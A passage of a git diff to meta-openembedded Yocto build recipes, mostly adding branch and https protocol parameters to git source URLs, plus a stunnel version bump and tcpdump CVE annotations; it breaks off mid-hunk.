file://0001-Fix-build-errors-with-clang.patch \ file://0001-addrdb-coord-config-parse.y-add-missing-time.h-inclu.patch \ diff --git a/meta-openembedded/meta-networking/recipes-support/mtr/mtr_0.93.bb b/meta-openembedded/meta-networking/recipes-support/mtr/mtr_0.93.bb index dd150700a9..4db7f7bbf8 100644 --- a/meta-openembedded/meta-networking/recipes-support/mtr/mtr_0.93.bb +++ b/meta-openembedded/meta-networking/recipes-support/mtr/mtr_0.93.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://ui/mtr.c;beginline=5;endline=16;md5=00a894a39d53726a27386534d1c4e468" SRCREV = "304349bad86229aedbc62c07d5e98a8292967991" -SRC_URI = "git://github.com/traviscross/mtr" +SRC_URI = "git://github.com/traviscross/mtr;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-support/nbdkit/nbdkit_git.bb b/meta-openembedded/meta-networking/recipes-support/nbdkit/nbdkit_git.bb index a63e49ec55..0876c6f354 100644 --- a/meta-openembedded/meta-networking/recipes-support/nbdkit/nbdkit_git.bb +++ b/meta-openembedded/meta-networking/recipes-support/nbdkit/nbdkit_git.bb @@ -9,7 +9,7 @@ HOMEPAGE = "https://github.com/libguestfs/nbdkit" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=4332a97808994cf2133a65b6c6f33eaf" -SRC_URI = "git://github.com/libguestfs/nbdkit.git;protocol=https \ +SRC_URI = "git://github.com/libguestfs/nbdkit.git;protocol=https;branch=master \ file://0001-server-Fix-build-when-printf-is-a-macro.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-support/ndisc6/ndisc6_git.bb b/meta-openembedded/meta-networking/recipes-support/ndisc6/ndisc6_git.bb index 5f866052c6..d359b620b8 100644 --- a/meta-openembedded/meta-networking/recipes-support/ndisc6/ndisc6_git.bb +++ b/meta-openembedded/meta-networking/recipes-support/ndisc6/ndisc6_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" PV = "1.0.4+git${SRCPV}" SRCREV = "4c794b5512d23c649def1f94a684225dcbb6ac3e" -SRC_URI = "git://git.remlab.net/git/ndisc6.git;protocol=http \ +SRC_URI = "git://git.remlab.net/git/ndisc6.git;protocol=http;branch=master \ file://0001-replace-VLAIS-with-malloc-free-pair.patch \ file://0002-Do-not-undef-_GNU_SOURCE.patch \ file://0001-autogen-Do-not-symlink-gettext.h-from-build-host.patch \ diff --git a/meta-openembedded/meta-networking/recipes-support/netcf/netcf_0.2.8.bb b/meta-openembedded/meta-networking/recipes-support/netcf/netcf_0.2.8.bb index a180571f2d..af617ce922 100644 --- a/meta-openembedded/meta-networking/recipes-support/netcf/netcf_0.2.8.bb +++ b/meta-openembedded/meta-networking/recipes-support/netcf/netcf_0.2.8.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=fb919cc88dbe06ec0b0bd50e001ccf1f" SRCREV = "2c5d4255857531bc09d91dcd02e86545f29004d4" PV .= "+git${SRCPV}" -SRC_URI = "git://pagure.io/netcf.git;protocol=https \ +SRC_URI = "git://pagure.io/netcf.git;protocol=https;branch=master \ " UPSTREAM_CHECK_GITTAGREGEX = "release-(?P(\d+(\.\d+)+))" diff --git a/meta-openembedded/meta-networking/recipes-support/netperf/netperf_git.bb b/meta-openembedded/meta-networking/recipes-support/netperf/netperf_git.bb index d48f3aeabd..f6ea211f7a 100644 --- a/meta-openembedded/meta-networking/recipes-support/netperf/netperf_git.bb +++ b/meta-openembedded/meta-networking/recipes-support/netperf/netperf_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a0ab17253e7a3f318da85382c7d5d5d6" PV = "2.7.0+git${SRCPV}" -SRC_URI = "git://github.com/HewlettPackard/netperf.git \ +SRC_URI = "git://github.com/HewlettPackard/netperf.git;branch=master;protocol=https \ file://cpu_set.patch \ file://vfork.patch \ file://init \ diff --git a/meta-openembedded/meta-networking/recipes-support/nis/yp-tools_4.2.3.bb b/meta-openembedded/meta-networking/recipes-support/nis/yp-tools_4.2.3.bb index bb401666c6..0c67f67d70 100644 --- a/meta-openembedded/meta-networking/recipes-support/nis/yp-tools_4.2.3.bb +++ b/meta-openembedded/meta-networking/recipes-support/nis/yp-tools_4.2.3.bb @@ -14,7 +14,7 @@ and ypdomainname. \ # v4.2.3 SRCREV = "1bfda29c342a81b97cb1995ffd9e8da5de63e7ab" -SRC_URI = "git://github.com/thkukuk/yp-tools \ +SRC_URI = "git://github.com/thkukuk/yp-tools;branch=master;protocol=https \ file://domainname.service \ " diff --git a/meta-openembedded/meta-networking/recipes-support/ntimed/ntimed_git.bb b/meta-openembedded/meta-networking/recipes-support/ntimed/ntimed_git.bb index a749b16593..43ed1abe38 100644 --- a/meta-openembedded/meta-networking/recipes-support/ntimed/ntimed_git.bb +++ b/meta-openembedded/meta-networking/recipes-support/ntimed/ntimed_git.bb @@ -8,7 +8,7 @@ SECTION = "net" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://main.c;beginline=2;endline=24;md5=89db8e76f2951f3fad167e7aa9718a44" -SRC_URI = "git://github.com/bsdphk/Ntimed \ +SRC_URI = "git://github.com/bsdphk/Ntimed;branch=master;protocol=https \ file://use-ldflags.patch" PV = "0.0+git${SRCPV}" diff --git a/meta-openembedded/meta-networking/recipes-support/open-isns/open-isns_0.99.bb b/meta-openembedded/meta-networking/recipes-support/open-isns/open-isns_0.99.bb index a03b92f5fe..1bf7c48e09 100644 --- a/meta-openembedded/meta-networking/recipes-support/open-isns/open-isns_0.99.bb +++ b/meta-openembedded/meta-networking/recipes-support/open-isns/open-isns_0.99.bb @@ -13,7 +13,7 @@ SECTION = "net" DEPENDS = "openssl" -SRC_URI = "git://github.com/open-iscsi/open-isns" +SRC_URI = "git://github.com/open-iscsi/open-isns;branch=master;protocol=https" SRCREV = "cfdbcff867ee580a71bc9c18c3a38a6057df0150" diff --git a/meta-openembedded/meta-networking/recipes-support/phytool/phytool.bb b/meta-openembedded/meta-networking/recipes-support/phytool/phytool.bb index 29499d6d7a..7fde88c447 100644 --- a/meta-openembedded/meta-networking/recipes-support/phytool/phytool.bb +++ b/meta-openembedded/meta-networking/recipes-support/phytool/phytool.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=39bba7d2cf0ba1036f2a6e2be52fe3f0" PV = "2+git${SRCPV}" SRCREV = "8882328c08ba2efb13c049812098f1d0cb8adf0c" -SRC_URI = "git://github.com/wkz/phytool.git" +SRC_URI = "git://github.com/wkz/phytool.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-support/rdma-core/rdma-core_28.0.bb b/meta-openembedded/meta-networking/recipes-support/rdma-core/rdma-core_28.0.bb index 15fd7ff663..5cb4e67c28 100644 --- a/meta-openembedded/meta-networking/recipes-support/rdma-core/rdma-core_28.0.bb +++ b/meta-openembedded/meta-networking/recipes-support/rdma-core/rdma-core_28.0.bb @@ -6,7 +6,7 @@ DEPENDS = "libnl" RDEPENDS_${PN} = "bash perl" BRANCH = "stable-v${@d.getVar('PV').split('.')[0]}" -SRC_URI = "git://github.com/linux-rdma/rdma-core.git;branch=${BRANCH} \ +SRC_URI = "git://github.com/linux-rdma/rdma-core.git;branch=${BRANCH};protocol=https \ file://0001-Remove-man-files-which-cant-be-built.patch \ " SRCREV = "f12c953f0864691eacc9fcc4cda489b92ffd5a85" diff --git a/meta-openembedded/meta-networking/recipes-support/smcroute/smcroute_2.4.4.bb b/meta-openembedded/meta-networking/recipes-support/smcroute/smcroute_2.4.4.bb index 0b63f79aca..d8a1f6140f 100644 --- a/meta-openembedded/meta-networking/recipes-support/smcroute/smcroute_2.4.4.bb +++ b/meta-openembedded/meta-networking/recipes-support/smcroute/smcroute_2.4.4.bb @@ -6,7 +6,7 @@ LICENSE = "GPLv2+" LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" SRCREV = "a8e5847e5f7e411be424f9b52a6cdf9d2ed4aeb5" -SRC_URI = "git://github.com/troglobit/smcroute.git;branch=master;protocol=git" +SRC_URI = "git://github.com/troglobit/smcroute.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-support/spice/spice-protocol_git.bb b/meta-openembedded/meta-networking/recipes-support/spice/spice-protocol_git.bb index 1d56bea17c..ca683bf220 100644 --- a/meta-openembedded/meta-networking/recipes-support/spice/spice-protocol_git.bb +++ b/meta-openembedded/meta-networking/recipes-support/spice/spice-protocol_git.bb @@ -18,7 +18,7 @@ PV = "0.14.1+git${SRCPV}" SRCREV = "e0ec178a72aa33e307ee5ac02b63bf336da921a5" SRC_URI = " \ - git://anongit.freedesktop.org/spice/spice-protocol \ + git://anongit.freedesktop.org/spice/spice-protocol;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-support/spice/spice_git.bb b/meta-openembedded/meta-networking/recipes-support/spice/spice_git.bb index 9d3a0e6cb5..3d47f5a54a 100644 --- a/meta-openembedded/meta-networking/recipes-support/spice/spice_git.bb +++ b/meta-openembedded/meta-networking/recipes-support/spice/spice_git.bb @@ -21,8 +21,8 @@ SRCREV_spice-common = "4fc4c2db36c7f07b906e9a326a9d3dc0ae6a2671" SRCREV_FORMAT = "spice_spice-common" SRC_URI = " \ - git://anongit.freedesktop.org/spice/spice;name=spice \ - git://anongit.freedesktop.org/spice/spice-common;destsuffix=git/subprojects/spice-common;name=spice-common \ + git://anongit.freedesktop.org/spice/spice;name=spice;branch=master \ + git://anongit.freedesktop.org/spice/spice-common;destsuffix=git/subprojects/spice-common;name=spice-common;branch=master \ file://0001-Convert-pthread_t-to-be-numeric.patch \ file://0001-Fix-compile-errors-on-Linux-32bit-system.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-support/spice/usbredir_0.8.0.bb b/meta-openembedded/meta-networking/recipes-support/spice/usbredir_0.8.0.bb index 9ee43be1ea..f07fb3b50c 100644 --- a/meta-openembedded/meta-networking/recipes-support/spice/usbredir_0.8.0.bb +++ b/meta-openembedded/meta-networking/recipes-support/spice/usbredir_0.8.0.bb @@ -10,7 +10,7 @@ DEPENDS = "libusb1" SRCREV = "07b98b8e71f620dfdd57e92ddef6b677b259a092" SRC_URI = " \ - git://anongit.freedesktop.org/spice/usbredir \ + git://anongit.freedesktop.org/spice/usbredir;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-support/stunnel/stunnel_5.56.bb b/meta-openembedded/meta-networking/recipes-support/stunnel/stunnel_5.56.bb deleted file mode 100644 index 3411e5d0c7..0000000000 --- a/meta-openembedded/meta-networking/recipes-support/stunnel/stunnel_5.56.bb +++ /dev/null @@ -1,37 +0,0 @@ -SUMMARY = "Program for providing universal TLS/SSL tunneling service" -DESCRIPTION = "SSL encryption wrapper between remote client and local (inetd-startable) or remote server." -HOMEPAGE = "https://www.stunnel.org/" -SECTION = "net" -# Note: Linking stunnel statically or dynamically with other modules is making -# a combined work based on stunnel. Thus, the terms and conditions of the GNU -# General Public License cover the whole combination. -LICENSE = "GPLv2" -LIC_FILES_CHKSUM = "file://COPYING.md;md5=d6d635d290ba1705821254a0278f1ef7" - -DEPENDS = "autoconf-archive libnsl2 openssl" - -SRC_URI = "ftp://ftp.stunnel.org/stunnel/archive/5.x/${BP}.tar.gz \ - file://fix-openssl-no-des.patch \ -" - -SRC_URI[md5sum] = "01b0ca9e071f582ff803a85d5ed72166" -SRC_URI[sha256sum] = "7384bfb356b9a89ddfee70b5ca494d187605bb516b4fff597e167f97e2236b22" - -inherit autotools - -PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6 systemd', d)} libwrap" - -PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," -PACKAGECONFIG[libwrap] = "--enable-libwrap,--disable-libwrap,tcp-wrappers" -PACKAGECONFIG[systemd] = "--enable-systemd,--disable-systemd,systemd" - -EXTRA_OECONF += "--with-ssl='${STAGING_EXECPREFIXDIR}' --disable-fips" - -# When cross compiling, configure defaults to nobody, but provides no option to change it. -EXTRA_OEMAKE += "DEFAULT_GROUP='nogroup'" - -# stunnel3 is a Perl wrapper to allow use of the legacy stunnel 3.x commandline -# syntax with stunnel >= 4.05 -PACKAGES =+ "stunnel3" -FILES_stunnel3 = "${bindir}/stunnel3" -RDEPENDS_stunnel3 += "${PN} perl" diff --git a/meta-openembedded/meta-networking/recipes-support/stunnel/stunnel_5.57.bb b/meta-openembedded/meta-networking/recipes-support/stunnel/stunnel_5.57.bb new file mode 100644 index 0000000000..8f6de571f3 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/stunnel/stunnel_5.57.bb @@ -0,0 +1,36 @@ +SUMMARY = "Program for providing universal TLS/SSL tunneling service" +DESCRIPTION = "SSL encryption wrapper between remote client and local (inetd-startable) or remote server." +HOMEPAGE = "https://www.stunnel.org/" +SECTION = "net" +# Note: Linking stunnel statically or dynamically with other modules is making +# a combined work based on stunnel. Thus, the terms and conditions of the GNU +# General Public License cover the whole combination. +LICENSE = "GPLv2" +LIC_FILES_CHKSUM = "file://COPYING.md;md5=6bae28875b3b599f8f621f4335b17955" + +DEPENDS = "autoconf-archive libnsl2 openssl" + +SRC_URI = "ftp://ftp.stunnel.org/stunnel/archive/5.x/${BP}.tar.gz \ + file://fix-openssl-no-des.patch \ +" + +SRC_URI[sha256sum] = "af5ab973dde11807c38735b87bdd87563a47d2fa1c72a07929fcfce80a600fe1" + +inherit autotools + +PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6 systemd', d)} libwrap" + +PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," +PACKAGECONFIG[libwrap] = "--enable-libwrap,--disable-libwrap,tcp-wrappers" +PACKAGECONFIG[systemd] = "--enable-systemd,--disable-systemd,systemd" + +EXTRA_OECONF += "--with-ssl='${STAGING_EXECPREFIXDIR}' --disable-fips" + +# When cross compiling, configure defaults to nobody, but provides no option to change it. +EXTRA_OEMAKE += "DEFAULT_GROUP='nogroup'" + +# stunnel3 is a Perl wrapper to allow use of the legacy stunnel 3.x commandline +# syntax with stunnel >= 4.05 +PACKAGES =+ "stunnel3" +FILES_stunnel3 = "${bindir}/stunnel3" +RDEPENDS_stunnel3 += "${PN} perl" diff --git a/meta-openembedded/meta-networking/recipes-support/tcpdump/tcpdump/0001-PPP-When-un-escaping-don-t-allocate-a-too-large-buff.patch b/meta-openembedded/meta-networking/recipes-support/tcpdump/tcpdump/0001-PPP-When-un-escaping-don-t-allocate-a-too-large-buff.patch index 9b74e00c5b..84d4716f38 100644 --- a/meta-openembedded/meta-networking/recipes-support/tcpdump/tcpdump/0001-PPP-When-un-escaping-don-t-allocate-a-too-large-buff.patch +++ b/meta-openembedded/meta-networking/recipes-support/tcpdump/tcpdump/0001-PPP-When-un-escaping-don-t-allocate-a-too-large-buff.patch @@ -9,6 +9,7 @@ if we haven't captured all of it. (backported from commit e4add0b010ed6f2180dcb05a13026242ed935334) +CVE: CVE-2020-8037 Upstream-Status: Backport Signed-off-by: Stacy Gaikovaia diff --git a/meta-openembedded/meta-networking/recipes-support/tcpdump/tcpdump_4.9.3.bb b/meta-openembedded/meta-networking/recipes-support/tcpdump/tcpdump_4.9.3.bb index 8f7bd59f18..2ea493863a 100644 --- a/meta-openembedded/meta-networking/recipes-support/tcpdump/tcpdump_4.9.3.bb +++ b/meta-openembedded/meta-networking/recipes-support/tcpdump/tcpdump_4.9.3.bb @@ -50,3 +50,8 @@ do_install_append() { do_compile_ptest() { oe_runmake buildtest-TESTS } + +#https://nvd.nist.gov/vuln/detail/CVE-2020-8036 +#Introduce in 4.9 by 246ca110 Autosar SOME/IP protocol support +#which does not exist in 4.9.3 +CVE_CHECK_WHITELIST += "CVE-2020-8036" diff --git a/meta-openembedded/meta-networking/recipes-support/unbound/unbound_1.9.4.bb b/meta-openembedded/meta-networking/recipes-support/unbound/unbound_1.9.4.bb index 6200214acb..f4b3c28ae4 100644 --- a/meta-openembedded/meta-networking/recipes-support/unbound/unbound_1.9.4.bb +++ b/meta-openembedded/meta-networking/recipes-support/unbound/unbound_1.9.4.bb @@ -9,7 +9,7 @@ SECTION = "net" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=5308494bc0590c0cb036afd781d78f06" -SRC_URI = "git://github.com/NLnetLabs/unbound.git;protocol=http;branch=master \ +SRC_URI = "git://github.com/NLnetLabs/unbound.git;protocol=http;branch=master;protocol=https \ file://0001-contrib-add-yocto-compatible-startup-scripts.patch \ " SRCREV="b60c4a472c856f0a98120b7259e991b3a6507eb5" diff --git a/meta-openembedded/meta-networking/recipes-support/wpan-tools/wpan-tools_0.9.bb b/meta-openembedded/meta-networking/recipes-support/wpan-tools/wpan-tools_0.9.bb index bab75fee3f..6b83cbd522 100644 --- a/meta-openembedded/meta-networking/recipes-support/wpan-tools/wpan-tools_0.9.bb +++ b/meta-openembedded/meta-networking/recipes-support/wpan-tools/wpan-tools_0.9.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4cfd939b1d7e6aba9fcefb7f6e2fd45d" DEPENDS = "libnl" -SRC_URI = "git://github.com/linux-wpan/wpan-tools" +SRC_URI = "git://github.com/linux-wpan/wpan-tools;branch=master;protocol=https" SRCREV = "a316ca2caa746d60817400e5bf646c2820f09273" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-benchmark/speedtest-cli/speedtest-cli_2.1.2.bb b/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-benchmark/speedtest-cli/speedtest-cli_2.1.2.bb index de4fa16426..75a206c6b8 100644 --- a/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-benchmark/speedtest-cli/speedtest-cli_2.1.2.bb +++ b/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-benchmark/speedtest-cli/speedtest-cli_2.1.2.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=3b83ef96387f14655fc854ddc3c6bd57" inherit setuptools3 -SRC_URI = "git://github.com/sivel/speedtest-cli.git" +SRC_URI = "git://github.com/sivel/speedtest-cli.git;branch=master;protocol=https" SRCREV = "c58ad3367bf27f4b4a4d5b1bca29ebd574731c5d" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb b/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb index 065243ccfe..f55247d9ed 100644 --- a/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb +++ b/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb @@ -21,7 +21,7 @@ SRCREV_inih = "4b10c654051a86556dfdb634c891b6c3224c4109" SRCREV_FORMAT = "rwmem_inih" SRC_URI = " \ - git://github.com/tomba/rwmem.git;protocol=https;name=rwmem \ + git://github.com/tomba/rwmem.git;protocol=https;name=rwmem;branch=master \ git://github.com/benhoyt/inih.git;protocol=https;name=inih;nobranch=1;destsuffix=git/ext/inih \ " diff --git a/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb b/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb index 58841ef319..7ef8f69827 100644 --- a/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb +++ b/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb @@ -14,7 +14,7 @@ inherit scons dos2unix siteinfo python3native PV = "4.2.2" #v4.2.2 SRCREV = "a0bbbff6ada159e19298d37946ac8dc4b497eadf" -SRC_URI = "git://github.com/mongodb/mongo.git;branch=v4.2 \ +SRC_URI = "git://github.com/mongodb/mongo.git;branch=v4.2;protocol=https \ file://0001-Tell-scons-to-use-build-settings-from-environment-va.patch \ file://0001-Use-long-long-instead-of-int64_t.patch \ file://0001-Use-__GLIBC__-to-control-use-of-gnu_get_libc_version.patch \ diff --git a/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-extended/lcdproc/lcdproc_git.bb b/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-extended/lcdproc/lcdproc_git.bb index 275b984e47..f0a0c67975 100644 --- a/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-extended/lcdproc/lcdproc_git.bb +++ b/meta-openembedded/meta-oe/dynamic-layers/meta-python/recipes-extended/lcdproc/lcdproc_git.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=18810669f13b87348459e611d31ab760 \ PV = "0.5.9+git${SRCPV}" SRCREV = "3a3d622d9bb74c44fa67bc20573751a207514134" -SRC_URI = "git://github.com/lcdproc/lcdproc \ +SRC_URI = "git://github.com/lcdproc/lcdproc;branch=master;protocol=https \ file://0001-Fix-parallel-build-fix-port-internal-make-dependenci.patch \ file://0002-Include-limits.h-for-PATH_MAX-definition.patch \ file://0003-Fix-non-x86-platforms-on-musl.patch \ diff --git a/meta-openembedded/meta-oe/recipes-benchmark/cpuburn/cpuburn-arm_git.bb b/meta-openembedded/meta-oe/recipes-benchmark/cpuburn/cpuburn-arm_git.bb index b21212a430..de2341da4c 100644 --- a/meta-openembedded/meta-oe/recipes-benchmark/cpuburn/cpuburn-arm_git.bb +++ b/meta-openembedded/meta-oe/recipes-benchmark/cpuburn/cpuburn-arm_git.bb @@ -9,7 +9,7 @@ SRCREV = "ad7e646700d14b81413297bda02fb7fe96613c3f" PV = "1.0+git${SRCPV}" -SRC_URI = "git://github.com/ssvb/cpuburn-arm.git \ +SRC_URI = "git://github.com/ssvb/cpuburn-arm.git;branch=master;protocol=https \ file://0001-cpuburn-a8.S-Remove-.func-.endfunc.patch \ file://0002-burn.S-Add.patch \ file://0003-burn.S-Remove-.func-.endfunc.patch \ diff --git a/meta-openembedded/meta-oe/recipes-benchmark/fio/fio_3.17.bb b/meta-openembedded/meta-oe/recipes-benchmark/fio/fio_3.17.bb index 759d1087c0..bb3243a5cc 100644 --- a/meta-openembedded/meta-oe/recipes-benchmark/fio/fio_3.17.bb +++ b/meta-openembedded/meta-oe/recipes-benchmark/fio/fio_3.17.bb @@ -23,7 +23,7 @@ PACKAGECONFIG ??= "${PACKAGECONFIG_NUMA}" PACKAGECONFIG[numa] = ",--disable-numa,numactl" SRCREV = "08ce9dc20b8a4e55db7af6d869ddfa49b4a02d03" -SRC_URI = "git://git.kernel.dk/fio.git \ +SRC_URI = "git://git.kernel.dk/fio.git;branch=master \ file://0001-update-the-interpreter-paths.patch \ file://python3_shebangs.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb b/meta-openembedded/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb index 6d20bbdaf1..4976bf6905 100644 --- a/meta-openembedded/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb +++ b/meta-openembedded/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb @@ -14,7 +14,7 @@ PV = "20191226+${SRCPV}" COMPATIBLE_HOST_rpi = "${@bb.utils.contains('MACHINE_FEATURES', 'vc4graphics', '.*-linux*', 'null', d)}" -SRC_URI = "git://github.com/glmark2/glmark2.git;protocol=https \ +SRC_URI = "git://github.com/glmark2/glmark2.git;protocol=https;branch=master \ file://python3.patch" SRCREV = "72dabc5d72b49c6d45badeb8a941ba4d829b0bd6" diff --git a/meta-openembedded/meta-oe/recipes-benchmark/iperf3/iperf3_3.7.bb b/meta-openembedded/meta-oe/recipes-benchmark/iperf3/iperf3_3.7.bb index 98d2faabfd..8536de3518 100644 --- a/meta-openembedded/meta-oe/recipes-benchmark/iperf3/iperf3_3.7.bb +++ b/meta-openembedded/meta-oe/recipes-benchmark/iperf3/iperf3_3.7.bb @@ -13,7 +13,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=f9088fe7ffdccd042f7645f1012d7f70" DEPENDS = "openssl" -SRC_URI = "git://github.com/esnet/iperf.git \ +SRC_URI = "git://github.com/esnet/iperf.git;branch=master;protocol=https \ file://0002-Remove-pg-from-profile_CFLAGS.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-benchmark/libc-bench/libc-bench_git.bb b/meta-openembedded/meta-oe/recipes-benchmark/libc-bench/libc-bench_git.bb index e813894316..60286c3249 100644 --- a/meta-openembedded/meta-oe/recipes-benchmark/libc-bench/libc-bench_git.bb +++ b/meta-openembedded/meta-oe/recipes-benchmark/libc-bench/libc-bench_git.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=9a825c63897c53f487ef900598c31527" SRCREV = "b6b2ce5f9f87a09b14499cb00c600c601f022634" PV = "20110206+git${SRCPV}" -SRC_URI = "git://git.musl-libc.org/libc-bench \ +SRC_URI = "git://git.musl-libc.org/libc-bench;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-benchmark/libhugetlbfs/libhugetlbfs_git.bb b/meta-openembedded/meta-oe/recipes-benchmark/libhugetlbfs/libhugetlbfs_git.bb index 4768d7b63a..d6c35d0b3a 100644 --- a/meta-openembedded/meta-oe/recipes-benchmark/libhugetlbfs/libhugetlbfs_git.bb +++ b/meta-openembedded/meta-oe/recipes-benchmark/libhugetlbfs/libhugetlbfs_git.bb @@ -12,7 +12,7 @@ PE = "1" SRCREV = "e6499ff92b4a7dcffbd131d1f5d24933e48c3f20" SRC_URI = " \ - git://github.com/libhugetlbfs/libhugetlbfs.git;protocol=https \ + git://github.com/libhugetlbfs/libhugetlbfs.git;protocol=https;branch=master \ file://skip-checking-LIB32-and-LIB64-if-they-point-to-the-s.patch \ file://libhugetlbfs-avoid-search-host-library-path-for-cros.patch \ file://tests-Makefile-install-static-4G-edge-testcases.patch \ diff --git a/meta-openembedded/meta-oe/recipes-benchmark/stressapptest/stressapptest_1.0.9.bb b/meta-openembedded/meta-oe/recipes-benchmark/stressapptest/stressapptest_1.0.9.bb index a2966e99dd..d30ea5a01b 100644 --- a/meta-openembedded/meta-oe/recipes-benchmark/stressapptest/stressapptest_1.0.9.bb +++ b/meta-openembedded/meta-oe/recipes-benchmark/stressapptest/stressapptest_1.0.9.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=55ea9d559f985fb4834317d8ed6b9e58" SRCREV = "fb72e5e5f0879231f38e0e826a98a6ca2d1ca38e" -SRC_URI = "git://github.com/stressapptest/stressapptest \ +SRC_URI = "git://github.com/stressapptest/stressapptest;branch=master;protocol=https \ file://libcplusplus-compat.patch \ file://read_sysfs_for_cachesize.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-benchmark/tinymembench/tinymembench_git.bb b/meta-openembedded/meta-oe/recipes-benchmark/tinymembench/tinymembench_git.bb index 2ce10f9c44..9c20d68ef2 100644 --- a/meta-openembedded/meta-oe/recipes-benchmark/tinymembench/tinymembench_git.bb +++ b/meta-openembedded/meta-oe/recipes-benchmark/tinymembench/tinymembench_git.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://main.c;endline=22;md5=879b9bbb60851454885b5fa47eb6b34 PV = "0.4.0+git${SRCPV}" SRCREV = "a2cf6d7e382e3aea1eb39173174d9fa28cad15f3" -SRC_URI = "git://github.com/ssvb/tinymembench.git \ +SRC_URI = "git://github.com/ssvb/tinymembench.git;branch=master;protocol=https \ file://0001-asm-Delete-.func-.endfunc-directives.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-bsp/cpufrequtils/cpufrequtils_008.bb b/meta-openembedded/meta-oe/recipes-bsp/cpufrequtils/cpufrequtils_008.bb index 88fcc0200f..589d62717c 100644 --- a/meta-openembedded/meta-oe/recipes-bsp/cpufrequtils/cpufrequtils_008.bb +++ b/meta-openembedded/meta-oe/recipes-bsp/cpufrequtils/cpufrequtils_008.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" SRCREV = "a2f0c39d5f21596bb9f5223e895c0ff210b265d0" # SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/cpufreq/cpufrequtils.git -SRC_URI = "git://github.com/emagii/cpufrequtils.git \ +SRC_URI = "git://github.com/emagii/cpufrequtils.git;branch=master;protocol=https \ file://0001-dont-unset-cflags.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-bsp/edac-utils/edac-utils_git.bb b/meta-openembedded/meta-oe/recipes-bsp/edac-utils/edac-utils_git.bb index b89fe6771c..e42adc6dc0 100644 --- a/meta-openembedded/meta-oe/recipes-bsp/edac-utils/edac-utils_git.bb +++ b/meta-openembedded/meta-oe/recipes-bsp/edac-utils/edac-utils_git.bb @@ -11,7 +11,7 @@ PV = "0.18+git${SRCPV}" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/grondo/edac-utils \ +SRC_URI = "git://github.com/grondo/edac-utils;branch=master;protocol=https \ file://make-init-script-be-able-to-automatically-load-EDAC-.patch \ file://add-restart-to-initscript.patch \ file://edac.service \ diff --git a/meta-openembedded/meta-oe/recipes-bsp/ledmon/ledmon_git.bb b/meta-openembedded/meta-oe/recipes-bsp/ledmon/ledmon_git.bb index f9ae9aad9a..1a9cb18c5c 100644 --- 